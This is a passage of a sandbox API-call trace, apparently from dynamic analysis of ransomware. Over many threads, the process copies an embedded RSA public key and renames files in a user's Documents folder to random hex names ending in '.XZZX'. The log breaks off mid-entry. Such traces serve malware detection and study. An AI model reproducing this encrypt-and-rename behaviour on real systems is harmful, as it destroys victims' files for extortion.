lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.197] SetErrorMode (uMode=0x1) returned 0x1 [0175.197] lstrcpyW (in: lpString1=0x29af860, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0175.197] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x7f16f9c4, Data2=0x980c, Data3=0x49df, Data4=([0]=0x81, [1]=0x5e, [2]=0x3e, [3]=0xbc, [4]=0xf0, [5]=0xbd, [6]=0x9, [7]=0xc))) returned 0x0 [0175.197] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\1B49D0D52A00521DE10DAFA32E183665.XZZX") returned 102 [0175.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0175.197] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\996015302BDFDE747F16F9C42E7AC2BC.XZZX") returned 102 [0175.197] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 614 os_tid = 0x214 [0175.351] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.351] lstrcpyW (in: lpString1=0x29af460, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0175.351] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.351] SetErrorMode (uMode=0x1) returned 0x1 [0175.351] lstrcpyW (in: lpString1=0x29af860, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0175.351] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xeadf9d38, Data2=0x2a3b, Data3=0x4ac4, Data4=([0]=0x98, [1]=0x5, [2]=0x48, [3]=0xfd, [4]=0x76, [5]=0x54, [6]=0xe9, [7]=0xea))) returned 0x0 [0175.351] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned 102 [0175.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0175.351] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\D1546BE80C55632CEADF9D380EF04774.XZZX") returned 102 [0175.352] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 615 os_tid = 0x364 [0175.507] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.507] lstrcpyW (in: lpString1=0x29af460, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0175.507] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.507] SetErrorMode (uMode=0x1) returned 0x1 [0175.507] lstrcpyW (in: lpString1=0x29af860, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0175.507] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xd9e34167, Data2=0x74d1, Data3=0x430e, Data4=([0]=0xbc, [1]=0xac, [2]=0x10, [3]=0xc4, [4]=0x65, [5]=0xb2, [6]=0x1a, [7]=0x8f))) returned 0x0 [0175.507] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\2525214410F7DA278BE33B7C150FBE6F.XZZX") returned 102 [0175.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0175.507] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\DC2B11171E99166ED9E341672133FAB6.XZZX") returned 102 [0175.507] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 616 os_tid = 0x368 [0175.663] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.663] lstrcpyW (in: lpString1=0x29af460, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0175.663] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.663] SetErrorMode (uMode=0x1) returned 0x1 [0175.663] lstrcpyW (in: lpString1=0x29af860, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0175.663] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x9850cda3, Data2=0xecd9, Data3=0x4f36, Data4=([0]=0xba, [1]=0x6, [2]=0x5f, [3]=0xd7, [4]=0xad, [5]=0xbf, [6]=0x7b, [7]=0x2d))) returned 0x0 [0175.663] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\3D3271B13FFA5012E003EAB54427345A.XZZX") returned 102 [0175.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0175.664] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\9A10932B4948ECC69850CDA34BE3D10E.XZZX") returned 102 [0175.664] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 617 os_tid = 0x678 [0175.819] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.819] lstrcpyW (in: lpString1=0x29af460, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0175.819] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.819] SetErrorMode (uMode=0x1) returned 0x1 [0175.819] lstrcpyW (in: lpString1=0x29af860, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0175.819] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x43b07b16, Data2=0xd5ed, Data3=0x4a27, Data4=([0]=0xb6, [1]=0x4b, [2]=0xe5, [3]=0xe7, [4]=0x6a, [5]=0x21, [6]=0xef, [7]=0xad))) returned 0x0 [0175.819] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\4718805A3B556C301085A1313FC25078.XZZX") returned 102 [0175.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0175.819] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\80CB415E3DF7191B43B07B164091FD63.XZZX") returned 102 [0175.820] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 618 os_tid = 0x158 [0175.974] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.974] lstrcpyW (in: lpString1=0x29af460, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0175.974] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0175.974] SetErrorMode (uMode=0x1) returned 0x1 [0175.975] lstrcpyW (in: lpString1=0x29af860, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0175.975] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x99ef96cf, Data2=0xf4ce, Data3=0x4824, Data4=([0]=0x86, [1]=0x8f, [2]=0xe1, [3]=0x98, [4]=0xeb, [5]=0xa, [6]=0xb2, [7]=0x63))) returned 0x0 [0175.975] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned 102 [0175.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0175.975] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\3A88A69244FC5CF899EF96CF47974140.XZZX") returned 102 [0175.975] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 619 os_tid = 0x320 [0176.130] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.130] lstrcpyW (in: lpString1=0x29af460, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0176.130] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0176.130] SetErrorMode (uMode=0x1) returned 0x1 [0176.130] lstrcpyW (in: lpString1=0x29af860, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0176.130] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xdf7da40c, Data2=0x5e7, Data3=0x4d42, Data4=([0]=0xb4, [1]=0xf3, [2]=0xd, [3]=0xae, [4]=0x21, [5]=0x42, [6]=0x75, [7]=0xd1))) returned 0x0 [0176.131] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\A0DC431228DE1E088FD30DB72CF60250.XZZX") returned 102 [0176.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0176.131] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\1E9342D401C8008EDF7DA40C0462E4D6.XZZX") returned 102 [0176.131] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 620 os_tid = 0x570 Thread: id = 621 os_tid = 0x67c [0176.286] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.286] lstrcpyW (in: lpString1=0x2aaf460, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0176.286] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0176.287] SetErrorMode (uMode=0x1) returned 0x1 [0176.287] lstrcpyW (in: lpString1=0x2aaf860, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0176.287] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x62c8ee5b, Data2=0xe9da, Data3=0x42d0, Data4=([0]=0x93, [1]=0x4d, [2]=0x29, [3]=0xaa, [4]=0x1, [5]=0x35, [6]=0x58, [7]=0x6d))) returned 0x0 [0176.287] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned 102 [0176.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0176.287] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\000BCC7E3D08352062C8EE5B3FB31968.XZZX") returned 102 [0176.287] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 622 os_tid = 0x598 [0176.443] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.443] 